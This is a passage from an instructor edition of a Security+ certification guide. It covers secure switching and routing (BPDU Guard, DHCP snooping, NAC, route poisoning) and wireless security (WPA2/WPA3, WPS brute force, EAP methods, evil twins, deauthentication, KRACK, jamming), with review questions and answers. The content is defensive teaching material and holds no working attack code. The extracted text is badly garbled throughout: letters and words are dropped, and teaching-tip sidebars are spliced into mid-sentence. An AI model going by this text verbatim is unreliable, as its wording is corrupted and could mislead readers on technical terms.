This diagram shows the minimum configuration necessary to prevent loops in a

network with three bridges or switches. The root bridge has two designated ports
D connected to ridge A and ridge . ridges A and both have root ports
connected back to the interfaces on the root bridge. Bridges A and B also have a
connection directly to one another. n ridge A, this interface is active and traffic for
ridge can be forwarded directly over it. n ridge , the interface is blocked to
prevent a loop and traffic for ridge A must be forwarded via the root bridge.

roadcast torm re ention

T is principally designed to prevent broadcast storms. witches forward broadcast,
multicast, and unknown unicast traffic out of all ports. If a bridged network contains
a loop, broadcast traffic will travel through the network, get amplified by the other
switches, and arrive back at the original switch, which will re broadcast each incoming
broadcast frame, causing an e ponential increase the storm , which will rapidly
overwhelm the switches and crash the network.
A loop can be created accidentally or maliciously by plugging a patch cable from
one patch panel port to another or connecting two wall ports. Normally, T should
detect and close the loop, resulting in a few seconds disruption and then ongoing
poor performance. owever, T may be misconfigured or a threat actor may have
managed to disrupt it. A storm control setting on a switch is a backup mechanism to
rate limit broadcast traffic above a certain threshold.

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 230 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Bridge Protocol Data Unit (BPDU) Guard

A threat actor might try to attack T using a rogue switch or software designed to
imitate a switch. When a switch does not know the correct port to use for a particular
destination MAC address if the cache has ust been ushed, for instance , it oods the
unknown unicast frame out to all ports. Topology changes in T can cause a switch to
ush the cache more fre uently and to start ooding unicast traffic more fre uently,
which can have a serious impact on network performance and assists sniffing attacks.
The configuration of switch ports should prevent the use of T over ports designated
for client devices access ports . An access port is configured with the portfast
command to prevent T changes from delaying client devices trying to connect to the
port. Additionally, the BPDU Guard setting should be applied. This causes a portfast-
configured port that receives a D to become disabled cisco.com/c/en/us/td/docs/
switches lan catalyst gl configuration guide stp enha.html . ridge rotocol
Data nits D s are used to communicate information about the topology and are
not e pected on access ports, so D uard protects against misconfiguration or a
possible malicious attack.

Show Slide(s) Physical Port Security and MAC Filtering

hysical ort ecurity
Because of the risks from rogue devices and the potential to create loops by incorrect
and MAC Filtering placement of patch cables, access to the physical switch ports and switch hardware
should be restricted to authori ed sta , using a secure server room and or lockable
Teaching hardware cabinets. To prevent the attachment of unauthorized client devices at
Tip unsecured wall ports, the switch port that the wall port cabling connects to can be
Make sure students disabled by using the management software, or the patch cable can be physically
understand the removed from the port. Completely disabling ports in this way can introduce a lot
di erence between of administrative overhead and scope for error. Also, it doesn't provide complete
physical network protection, as an attacker could unplug a device from an enabled port and connect
ports and TC D
application ports.
their own laptop. Conse uently, more sophisticated methods of ensuring port
security have been developed.

MAC Filtering and MAC Limiting

Configuring AC filterin on a switch means defining which MAC addresses are
allowed to connect to a particular port. This can be done by creating a list of valid
MAC addresses or by specifying a limit to the number of permitted addresses. For
e ample, if port security is enabled with a ma imum of two MAC addresses, the switch
will record the first two MACs to connect to that port, but then drop any traffic from
machines with di erent MAC addresses that try to connect cisco.com/c/en/us/td/
docs/ios/lanswitch/command/reference/lsw_book/lsw_m1.html . This provides a guard
against MAC ooding attacks.

DHCP Snooping
Another option is to configure namic ost Confi uration rotocol C
snooping. D C is the protocol that allows a server to assign I address information to
a client when it connects to the network. D C snooping inspects this traffic arriving on
access ports to ensure that a host is not trying to spoof its MAC address. It can also be
used to prevent rogue or spurious D C servers from operating on the network. ith
D C snooping, only D C messages from ports configured as trusted are allowed.
Additionally dynamic A inspection DAI , which can be configured alongside D C
snooping, prevents a host attached to an untrusted port from ooding the segment
with gratuitous A replies. DAI maintains a trusted database of I A mappings
and ensures that A packets are validly constructed and use valid I addresses
cisco.com c en us td docs switches lan catalyst ios configuration guide
book/snoodhcp.html .

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 231

Configuring A P inspection on a Cisco switch.

Network Access Control Show Slide(s)

Endpoint security is a set of security procedures and technologies designed to restrict Network Access
network access at a device level. Endpoint security contrasts with the focus on Control
perimeter security established by topologies such as DM and technologies such as
firewalls. ndpoint security does not replace these but adds defense in depth. Teaching
Tip
The I . standard defines a port-based network access control (PNAC)
ou can mention
mechanism. NAC means that the switch uses an AAA server to authenticate the
zero-trust and
attached device before activating the port. Network access control (NAC) products unified endpoint
can extend the scope of authentication to allow administrators to devise policies or management M
profiles describing a minimum security configuration that devices must meet to be solutions as modern
granted network access. This is called a health policy. Typical policies check things such implementations of
as malware infection, firmware and patch level, personal firewall status, and the NAC.
presence of up to date virus definitions. A solution may also be to scan the registry or
perform file signature verification. The health policy is defined on a NAC management
server along with reporting and configuration tools.
Posture assessment is the process by which host health checks are performed against
a client device to verify compliance with the health policy. Most NAC solutions use
client software called an agent to gather information about the device, such as its anti
virus and patch status, presence of prohibited applications, or anything else defined by
the health policy.

efining policy violations in Packet ence Open Source AC.

(Screenshot used with permission from packetfence.org.)

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 232 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

An agent can be persistent, in which case it is installed as a software application on the

client, or non persistent. A non persistent or dissolvable agent is loaded into memory
during posture assessment but is not installed on the device.

Packet ence supports the use of several scanning techni ues, including vulnerability scanners, such
as essus and Open AS, indows anagement Instrumentation ( I) ueries, and log parsers.
(Screenshot used with permission from packetfence.org.)

Some NAC solutions can perform agentless posture assessment. This is useful when
Show Slide(s) the NAC solution must support a wide range of devices, such as smartphones, tablets,
and Internet of Things IoT devices, but less detailed information about the client is
oute ecurity available with an agentless solution.

Teaching
Tip
oute ecurit
tudents may benefit A successful attack against route security enables the attacker to redirect traffic from
from further reading its intended destination. n the Internet, this may allow the threat actor to herd users
on switching and to spoofed websites. n an enterprise network, it may facilitate circumventing firewalls
routing attacks. Cisco's
website is a valuable
and security ones to allow lateral movement and data e filtration.
source of information outes between networks and subnets can be configured manually, but most routers
and advice.
automatically discover routes by communicating with each other. Dynamic routers
oint out that you will exchange information about routes using routing protocols. It is important that this
discuss the functions
traffic be separated from channels used for other types of data. outing protocols
of firewalls in more
detail later in the do not always have e ective integral security mechanisms, so they need to run in an
course. environment where access is very tightly controlled.

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 233

Sample routing table showing routes obtained from different sources, such as static configuration,
direct connection, and learned from the order Gateway Protocol ( GP) routing protocol.

outing is sub ect to numerous vulnerabilities, including

• poofed routing information route in ection outing protocols that have no or
weak authentication are vulnerable to route table poisoning. This can mean that
traffic is misdirected to a monitoring port sniffing , sent to a blackhole non e istent
address , or continuously looped around the network, causing Do . Most dynamic
routing protocols support message authentication via a shared secret configured on
each device. This can be difficult to administer, however. It is usually also possible to
configure how a router identifies the peers from which it will accept route updates.
This makes it harder to simply add a rogue router to the system. An attacker would
have to compromise an e isting router and change its configuration.

• ource routing This uses an option in the I header to pre determine the route
a packet will take through the network strict or waypoints that it must pass
through loose . This can be used maliciously to spoof I addresses and bypass
router firewall filters. outers can be configured to block source routed packets.

• oftware e ploits in the underlying operating system. ardware routers and

switches have an embedded operating system. or e ample, Cisco devices typically
use the Internetwork perating ystem I . omething like I su ers from fewer
exploitable vulnerabilities than full network operating systems. It has a reduced
attack surface compared to a computer , such as indows.

On the other hand, SO O broadband routers can be particularly vulnerable to

unpatched exploits.

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 234 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Secure Switching and Routing
Answer the following uestions

1. Why might an ARP poisoning tool be of use to a threat actor performing

network reconnaissance?

The attacker could trick computers into sending traffic through the attacker's computer
performing a MitM on path attack and, therefore, e amine traffic that would not
normally be accessible to him on a switched network .

2. How could you prevent a malicious attacker from engineering a switching

loop from a host connected to a standard switch port?

nable the appropriate guards portfast and D uard on access ports.

3. What port security feature mitigates ARP poisoning?

Dynamic A inspection though this relies upon D C snooping being enabled.

4. What is a dissolvable agent?

ome network access control NAC solutions perform host health checks via a local
agent, running on the host. A dissolvable agent is one that is e ecuted in the host's
memory and C but not installed to a local disk.

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 235

Topic 9C
Teaching
Tip
This is a long topic,
but hopefully students
should understand the
basics already. Focus

Implement Secure Wireless on A and wireless

attacks.

Infrastructure Show Slide(s)

Wireless Network
Installation
EXAM OBJECTIVES COVERED Considerations
1. Given a scenario, analyze potential indicators associated with network attacks
. Given a scenario, install and configure wireless security settings Teaching
Tip
Technically, where
Most organizations have both a wired and a wireless network for employees to access multiple access points
provision the same
while on the move within their facilities. Understanding the potential threats and
network, the ID
vulnerabilities will allow you to successfully secure the wireless components of an should be referred to
organization's information systems infrastructure. as an Extended SSID
ID .

Wireless Network Installation Considerations Take the opportunity to

stress the importance
of the availability
Wireless network installation considerations refer to the factors that ensure good
component of CIA.
availability of authorized Wi-Fi access points. A network with patchy coverage is From a performance
vulnerable to rogue and evil twin attacks. perspective, a site
survey confirms that
The G z band has more space to configure non-overlapping channels. Also note that the WLAN is accessible
a AP can use bonded channels to improve bandwidth, but this increases risks from in all the areas it
interference. should be. From a
security perspective,
you need to ensure
that rogue A s cannot
be positioned in weak
Wireless Access Point (WAP) Placement signal areas.
ast versions of the
An infrastructure-based wireless network comprises one or more wireless access
exam objectives have
points, each connected to a wired network. The access points forward traffic to and been very keen on the
from the wired switched network. ach A is identified by its MAC address, also idea of limiting power
referred to as its basic service set identifier ID . ach wireless network is identified output to prevent war
by its name, or ser ice set identifier I . driving. This doesn't
seem to be the case
ireless networks can operate in either the . or radio band. ach radio with this iteration but
band is divided into a number of channels, and each A must be configured to use make students aware
a specific channel. or performance reasons, the channels chosen should be as widely that they may still see
some questions taking
spaced as possible to reduce di erent types of interference
this approach.
• Co channel interference CCI when two A s in close pro imity use the same
channel, they compete for bandwidth within that channel, as signals collide and Interaction
have to be re-transmitted. Opportunity
There are no scripted
• Ad acent channel interference ACI channels have only M spacing, but i i activities for this topic,
re uires M of channel space. hen the channels selected for A s are not but if you can demo
cleanly spaced, the interference pattern creates significant numbers of errors and some A configuration
settings or have a
loss of bandwidth. or e ample, if two access points within range of one another are
laptop or smartphone
configured in the . band with channels and , they will not overlap. If a third with Wi-Fi analyzer
access point is added using channel , it will use part of the spectrum used by both software, students may
the other A s, and all three networks will su er from interference. benefit from a more
hands-on approach.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 236 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Site Surveys and Heat Maps

The coverage and interference factors mean that A s must be positioned and
configured so that the whole area is covered, but that they overlap as little as possible.
A site survey is used to measure signal strength and channel usage throughout the
area to cover. A site survey starts with an architectural map of the site, with features
that can cause background interference marked. These features include solid walls,
re ective surfaces, motors, microwave ovens, and so on. The survey is performed with
a Wi-Fi-enabled laptop or mobile device with Wi-Fi analyzer software installed. The Wi-Fi
analyzer records information about the signal obtained at regularly spaced points as
the surveyor moves around the area.
These readings are combined and analyzed to produce a heat map, showing where
a signal is strong red or weak green blue , and which channel is being used and
how they overlap. This data is then used to optimi e the design, by ad usting transmit
power to reduce a A 's range, changing the channel on a A , adding a new A , or
physically moving a A to a new location.

Show Slide(s) Controller and Access oint ecurit

Controller and Access
here a site survey ensures availability, the confidentiality and integrity properties of
oint ecurity the network are ensured by configuring authentication and encryption. These settings
could be configured manually on each A , but this would be onerous in an enterprise
network with tens or hundreds of A . If access points are individually managed, this
can lead to configuration errors and can make it difficult to gain an overall view of the
wireless deployment, including which clients are connected to which access points and
which clients or access points are handling the most traffic.
ather than configure each device individually, enterprise wireless solutions implement
wireless controllers for centralized management and monitoring. A controller can be
a hardware appliance or a software application run on a server.

Uni i ireless etwork management console.

(Screenshot used with permission from Ubi uiti etworks.)

An access point whose firmware contains enough processing logic to be able to

function autonomously and handle clients without the use of a wireless controller is

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 237

known as a fat A , while one that re uires a wireless controller in order to function is
known as a thin A .
Controllers and access points must be made physically secure, as tampering could
allow a threat actor to insert a rogue evil twin A to try to intercept logons. These
devices must be managed like switches and routers, using secure management
interfaces and strong administrative credentials.

Wi-Fi Protected Access Show Slide(s)

As well as the site design, a wireless network must be configured with security settings. i i rotected Access
ithout encryption, anyone within range can intercept and read packets passing over
the wireless network. These choices are determined by device support for the various Teaching
i i security standards, by the type of authentication infrastructure, and by the Tip
purpose of the WLAN. The security standard determines the cryptographic protocols , A, and T I
that are supported, the means of generating the encryption key, and available have been removed
methods for authenticating wireless stations when they try to oin or associate with from the ob ectives,
the network. but it seems safer
to mention them, if
The first version of Wi-Fi Protected Access (WPA) was designed to fi critical only as comparison to
vulnerabilities in the earlier wired equivalent privacy (WEP) standard. Like , A A .
version of A uses the C stream cipher but adds a mechanism called the We also mention Wi-Fi
Temporal Key Integrity Protocol (TKIP) to make it stronger. 6 as a note. This is
not on the current
syllabus, but students
will quickly encounter
it, so it seems worthy
of inclusion.

Interaction
Configuring a TP- I SO O access point with wireless encryption and authentication settings. In this Opportunity
example, the . G z band allows legacy connections with PA -Personal security, while the G z ou could ask students
network is for 0 .11ax ( i- i 6) capable devices using PA -SAE authentication. to try some of the
(Screenshot used with permission from TP- ink Technologies.) emulators available
from vendor sites.
The emulator shown
Neither nor the original A version are considered secure enough for continued
in the screenshot is at
use. A uses the Advanced ncryption tandard A cipher with bit keys, emulator.tp-link.com/
deployed within the Counter Mode with Cipher Block Chaining Message Authentication Archer_AX20v1_US_
Code rotocol CCM . A replaces C and CCM replaces T I . CCM provides simulator/#wireless
authenticated encryption, which is designed to make replay attacks harder. SettingsAdv.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 238 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

eaknesses have also been found in A , however, which has led to its intended
replacement by A . The main features of A are as follows
• Simultaneous Authentication of Equals (SAE) replaces A's way handshake
authentication and association mechanism with a protocol based on Diffie ellman
key agreement.

• Enhanced Open—enables encryption for the open authentication method.

• pdated cryptographic protocols replaces A CCM with the AES Galois Counter
Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must
use bit A , while personal authentication can use either bit or bit.

• Management protection frames—mandates use of these to protect against key

recovery attacks.

i- i performance also depends on support for the latest 0 .11 standards. The most
recent generation ( 0 .11ax) is being marketed as i- i 6. The earlier standards are
retroactively named i- i ( 0 .11ac) and i- i ( 0 .11n). The performance standards
are developed in parallel with the PA security specifications. ost i- i 6 devices and
some i- i and i- i products should support PA , either natively or with a firmware
driver update.

Show Slide(s) Wi-Fi Authentication Methods

Wi-Fi Authentication
In order to secure a network, you need to be able to confirm that only valid users
Methods are connecting to it. i i authentication comes in three types personal, open, and
enterprise. ithin the personal category, there are two methods pre shared key
Teaching authentication and simultaneous authentication of e uals A .
Tip
The changes between A re hared e Authentication
versions of A are
all designed to try to In A , pre-shared key (PSK) authentication uses a passphrase to generate the key
prevent recovery of that is used to encrypt communications. It is also referred to as group authentication
the hash so that it because a group of users share the same secret. When the access point is set to
cannot be subjected A mode, the administrator configures a passphrase of between and A CII
to dictionary/brute characters. This is converted to a bit MAC e pressed as a character he value
force attacks, but
researchers are
using the D key stretching algorithm. This MAC is referred to as the pairwise
usually uick to find master key M . The same secret must be configured on the access point and on
weaknesses. Discuss each node that oins the network. The M is used as part of A 's way handshake
how di erent types to derive various session keys.
of networks should
account for these
All types of i- i personal authentication have been shown to be vulnerable to attacks
risks.
that allow dictionary or brute force attacks against the passphrase. At a minimum, the
passphrase must be at least 1 characters long to try to mitigate risks from cracking.

WPA3 Personal Authentication

hile A still uses a passphrase to authenticate stations in personal mode, it
changes the method by which this secret is used to agree session keys. The scheme
used is also referred to as assword Authenticated ey change A . In A , the
imultaneous Authentication of uals A protocol replaces the way handshake,
which has been found to be vulnerable to various attacks. A uses the Dragon y
handshake, which is basically Diffie elllman over elliptic curves key agreement,
combined with a hash value derived from the password and device MAC address to
authenticate the nodes. ith A , there should be no way for an attacker to sni the

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 239

handshake to obtain the hash value and try to use an o ine brute force or dictionary
attack to recover the password. Dragon y also implements ephemeral session keys,
providing forward secrecy.

The configuration interfaces for access points can use different labels for these methods.
You might see PA -Personal and PA -SAE rather than PA -PS and PA -Personal, for
example. Additionally, an access point can be configured for PA only or with support for
legacy PA ( PA -Personal Transition mode). esearchers already found aws in PA -
Personal, one of which relies on a downgrade attack to use PA (wi-fi.org security-update-
april- 01 ).

Wi-Fi Protected Setup Show Slide(s)

As setting up an access point securely is relatively comple for residential consumers, i i rotected etup
vendors have developed a system to automate the process called Wi-Fi Protected
Setup (WPS). To use , both the access point and wireless station client device
must be capable. Typically, the devices will have a push button. Activating this on
the access point and the adapter simultaneously will associate the devices using a IN,
then associate the adapter with the access point using A . The system generates a
random ID and . If the devices do not support the push button method, the IN
printed on the A can be entered manually.
nfortunately, is vulnerable to a brute force attack. hile the IN is eight
characters, one digit is a checksum and the rest are verified as two separate INs of
four and three characters. These separate INs are many orders of magnitude simpler
to brute force, typically re uiring ust hours to crack. n some models, disabling
through the admin interface does not actually disable the protocol, or there is
no option to disable it. ome A s can lock out an intruder if a brute force attack is
detected, but in some cases the attack can ust be resumed when the lockout period
e pires. To counter this, the lockout period can be increased. owever, this can leave
A s vulnerable to a denial of service Do attack. hen provisioning a A , it is
essential to verify what steps the vendor has taken to make their implementation
secure and the firmware level re uired to assure security.
The asy Connect method, announced alongside A , is intended to replace as
a method of securely configuring client devices with the information re uired to access
a i i network. asy Connect is a brand name for the Device rovisioning rotocol
D . ach participating device must be configured with a public private key pair. asy
Connect uses uick response codes or near field communication N C tags to
communicate each device's public key. A smartphone is registered as an Easy Connect
configurator app, and associated with the A using its code. ach client device can
then be associated by scanning its code or N C tag in the configurator app. As well
as fi ing the security problems associated with , this is a straightforward means of
configuring headless Internet of Things IoT devices with i i connectivity.

A uick response ( ) code is a barcode standard for encoding arbitrary alphanumeric or

binary strings within a s uare block pattern. The codes can be scanned using any type of
digital camera. Show Slide(s)

Open Authentication
and Captive ortals
Open Authentication and Captive Portals
Teaching
Selecting open authentication means that the client is not required to authenticate. Tip
This mode would be used on a public A or hotspot . In A , this also means Make sure students
that data sent over the link is unencrypted. Open authentication may be combined understand risks from
with a secondary authentication mechanism managed via a browser. When the client open access points.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 240 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

associates with the open hotspot and launches the browser, the client is redirected
to a captive portal or splash page. This will allow the client to authenticate to the
hotspot provider's network over TT , so the login is secure . The portal may also
be designed to enforce terms and conditions and/or take payment to access the
i i service.
hen using open wireless, users must ensure they send confidential web data only
over TT connections and only use email, oI , IM, and file transfer services with
L TL enabled. Another option is for the user to oin a irtual rivate Network
N . The user would associate with the open hotspot then start the N connection.
This creates an encrypted tunnel between the user's computer and the N
server. This allows the user to browse the web or connect to email services without
anyone eavesdropping on the open Wi-Fi network being able to intercept those
communications. The N could be provided by the user's company or they could use
a third party N service provider. f course, if using a third party, the user needs to
be able to trust them implicitly. The N must use certificate based tunneling to set up
the "inner" authentication method.
A can implement a mode called i i nhanced pen, which uses opportunistic
Show Slide(s) wireless encryption . uses the Dragon y handshake to agree ephemeral
session keys on oining the network. This means that one station cannot sni the traffic
nterprise I . from another station, because they are using di erent session keys. There is still no
Authentication authentication of the access point, however.

Teaching Enterprise/IEEE 802.1X Authentication

Tip
Note that this is The main problems with personal modes of authentication are that distribution of
the same general the key or passphrase cannot be secured properly, and users may choose unsecure
process that we phrases. ersonal authentication also fails to provide accounting, as all users share the
looked at already for same key.
ADI and NAC. The
access point is the As an alternative to personal authentication, the enterprise authentication method
authenticator and the implements I . to use an tensible Authentication rotocol A mechanism.
wireless station is the
. defines the use of A over ireless A o to allow an access point to
supplicant.
forward authentication data without allowing any other type of network access. It is
The main di erence
is the use of the
configured by selecting A nterprise or A nterprise as the security method on
credential to generate the access point.
session encryption
ith enterprise authentication, when a wireless station re uests an association,
keys. Note that the
access point does NOT the A enables the channel for A o traffic only. It passes the credentials of the
know the master key, supplicant to an AAA ADI or TACAC server on the wired network for validation.
otherwise it would be hen the supplicant has been authenticated, the AAA server transmits a master key
able to authenticate M to the supplicant. The supplicant and authentication server then derive the same
stations without the pairwise master key M from the M . The AAA server transmits the M to the the
ADI server.
access point. The wireless station and access point use the M to derive session keys,
It's not repeated here, using either the A way handshake or A A methods.
but remind students
that the A must be
configured with the I See tldp.org O TO 0 1 - O TO intro.html for more detailed information about the
address of the ADI
keys used.
server and the shared
secret.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 241

Using Cisco s irtual ireless A Controller to set security policies for a A this policy enforces
use of PA and the use of 0 .1 (Enterprise) authentication.
(Screenshot used with permission from Cisco.)

Extensible Authentication Protocol Show Slide(s)

The tensible Authentication rotocol A defines a framework for negotiating Extensible

authentication mechanisms rather than the details of the mechanisms themselves. Authentication
Vendors can write extensions to the protocol to support third-party security devices. rotocol
A implementations can include smart cards, one time passwords, biometric
identifiers, or simpler username and password combinations. Teaching
Tip
EAP-TLS is one of the strongest types of authentication and is very widely supported.
In the e am ob ectives,
An encrypted Transport Layer ecurity TL tunnel is established between the the specific A
supplicant and authentication server using public key certificates on the authentication types are strongly
server and supplicant. As both supplicant and server are configured with certificates, associated with
this provides mutual authentication. The supplicant will typically provide a certificate wireless security,
using a smart card or a certificate could be installed on the client device, possibly in a so they are covered
here rather than with
Trusted latform Module T M .
other authentication
technologies, but they
are applicable to any
sort of network access
device.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 242 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Configuring etwork Policy Server to authenticate wireless clients using 0 .1 EAP-T S.

(Screenshot used with permission from icrosoft.)

Show Slide(s) PEAP, EAP-TTLS, and EAP-FAST

A , A TTL , and
rovisioning certificates to each wireless device is a considerable management
A A T challenge. ther types of A are designed to provide secure tunneling with server
side certificates only.
Teaching
Tip Protected Extensible Authentication Protocol (PEAP)
here A TL
In Protected Extensible Authentication Protocol (PEAP), as with A TL , an
authenticates via a
machine certificate encrypted tunnel is established between the supplicant and authentication server, but
or smart card, other A only re uires a server side public key certificate. The supplicant does not re uire
types set up a secure a certificate. ith the server authenticated to the supplicant, user authentication can
tunnel for user then take place through the secure tunnel with protection against sniffing, password
authentication. This guessing dictionary, and on path attacks. The user authentication method also
means that client
certificates do not
referred to as the inner method can use either M C A v or A TC. The eneric
have to be deployed Token Card TC method transfers a token for authentication against a network
and managed. directory or using a one-time password mechanism.

EAP with Tunneled TLS (EAP-TTLS)

EAP-Tunneled TLS (EAP-TTLS) is similar to A . It uses a server side certificate to
establish a protected tunnel through which the user's authentication credentials can be
transmitted to the authentication server. The main distinction from A is that A
TTL can use any inner authentication protocol A or C A , for instance , while A
must use A M C A or A TC.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 243

EAP with Flexible Authentication via Secure Tunneling (EAP-FAST)

EAP with Flexible Authentication via Secure Tunneling (EAP-FAST) is similar to
A , but instead of using a certificate to set up the tunnel, it uses a rotected Access
Credential AC , which is generated for each user from the authentication server's
master key. The problem with A A T is in distributing provisioning the AC
securely to each user re uiring access. The AC can either be distributed via an out
of band method or via a server with a digital certificate but in the latter case, A
A T does not o er much advantage over using A . Alternatively, the AC can be
delivered via anonymous Diffie ellman key e change. The problem here is that there
is nothing to authenticate the access point to the user. A rogue access point could
obtain enough of the user credential to perform an A L A password cracking attack
techrepublic.com/article/ultimate-wireless-security-guide-a-primer-on-cisco-eap-fast-
authentication .

RADIUS Federation Show Slide(s)

Most implementations of A use a ADI server to validate the authentication ADI ederation
credentials for each user supplicant . ADI federation means that multiple
organi ations allow access to one another's users by oining their ADI servers into a
ADI hierarchy or mesh. or e ample, when ob from widget.foo needs to log on to
grommet.foo's network, the ADI server at grommet.foo recogni es that ob is not
a local user but has been granted access rights and routes the request to widget.foo's
ADI server.
ne e ample of ADI federation is the eduroam network eduroam.org , which
allows students of universities from several di erent countries to log on to the
networks of any of the participating institutions using the credentials stored by their
"home" university.

o ue Access oints and il T ins Show Slide(s)

A rogue access point is one that has been installed on the network without ogue Access oints
authori ation, whether with malicious intent or not. It is vital to periodically survey and Evil Twins
the site to detect rogue A s. A malicious user can set up such an access point with
something as basic as a smartphone with tethering capabilities, and a non malicious Teaching
user could enable such an access point by accident. If connected to a LAN without Tip
security, an unauthori ed A creates a backdoor through which to attack the Stress the importance
network. A rogue A could also be used to capture user logon attempts, allow man of disabling unused
in the middle attacks, and allow access to private information. connections and
services and scanning
A rogue A mas uerading as a legitimate one is called an evil twin. An evil twin for rogue systems.
might ust have a similar name ID to the legitimate one, or the attacker might use
some Do techni ue to overcome the legitimate A . This attack will not succeed
if authentication security is enabled on the A , unless the attacker also knows the
details of the authentication method. owever, the evil twin might be able to harvest
authentication information from users entering their credentials by mistake.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 244 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Surveying i- i networks using Cambium etworks (formerly irrus) i- i Inspector ote the presence
of print devices configured with open authentication (no security) and a smart T appliance
(re uiring authentication). (Screenshot used with permission from irrus.)

A rogue hardware A can be identified through physical inspections. There are also
various i i analy ers and monitoring systems that can detect rogue A s, including
in IDer metageek.com/products/inssider , ismet kismetwireless.net , and Cambium
Networks formerly irrus i i Inspector cambiumnetworks.com/products/software/
wifi designer and wifi inspector .

Show Slide(s) Disassociation and Replay Attacks

Disassociation and
The use of a rogue A may be coupled with a deauthentication attack. This sends a
eplay Attacks stream of spoofed frames to cause a client to deauthenticate from a A . The deauth
frames spoof the MAC address of the target station. This might allow the attacker to
Teaching perform a replay attack aimed at recovering the network key or interpose a rogue A .
Tip A similar attack hits the target with disassociation packets, rather than fully
While the syllabus deauthenticating the station. A disassociated station is not completely disconnected,
mentions the IV
but neither can it communicate on the network until it reassociates. Both attacks may
attack, as is
completely obsolete, also be used to perform a denial of service attack against the wireless infrastructure.
focus on replay and The attacks can be mitigated if the wireless infrastructure supports Management
key recovery attacks rame rotection M . w . oth the A and clients must be configured to
generally. support M .
re shared key authentication is vulnerable to various types of replay attack that aim
to capture the hash of the passphrase when a wireless station associates with an
access point. nce the hash is captured it can be sub ected to o ine brute force and
dictionary cracking. In , these are referred to as initiali ation vector I attacks,
because they e ploit aws in the mechanism that is supposed to ensure a uni ue
keystream, given the same key. A type of replay attack is used to make the access point
generate lots of packets, usually by deauthenticating a station, capturing its encrypted

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 245

A packet, and replaying this rapidly, causing the A to cycle through I values
uickly, revealing the hash part.
A and A are not vulnerable to IV attacks, but a serious vulnerability was
discovered in krackattacks.com . A AC attack uses a replay mechanism
that targets the way handshake. AC is e ective regardless of whether the
authentication mechanism is personal or enterprise. It is important to ensure both
clients and access points are fully patched against such attacks.

Jamming Attacks Show Slide(s)

A wireless network can be disrupted by interference from other radio sources. These Jamming Attacks
are often unintentional, but it is also possible for an attacker to purposefully am
an access point. This might be done simply to disrupt services or to position an evil
twin on the network with the hope of stealing data. A Wi-Fi jamming attack can be
performed by setting up a A with a stronger signal. i i amming devices are
also widely available, though they are often illegal to use and sometimes to sell. uch
devices can be very small, but the attacker still needs to gain fairly close physical
proximity to the wireless network.
The only ways to defeat a amming attack are either to locate the o ending radio
source and disable it, or to boost the signal from the legitimate e uipment. A s
for home and small business use are not often configurable, but the more advanced
wireless access points, such as Cisco's Aironet series, support configurable power
level controls. The source of interference can be detected using a spectrum analyzer.
nlike a i i analy er, a spectrum analy er must use a special radio receiver i
i adapters filter out anything that isn't a i i signal . They are usually supplied as
handheld units with a directional antenna, so that the e act location of the interference
can be pinpointed.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 246 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Secure Wireless Infrastructure
Answer the following uestions

1. True or false? Band selection has a critical impact on all aspects of the
security of a wireless network?

alse band selection can a ect availability and performance but does not have an
impact in terms of either confidentiality or integrity.

2. The network manager is recommending the use of "thin" access points to

implement the wireless network. What additional appliance or software is
required and what security advantages should this have?

ou need a wireless controller to configure and manage the access points. This makes
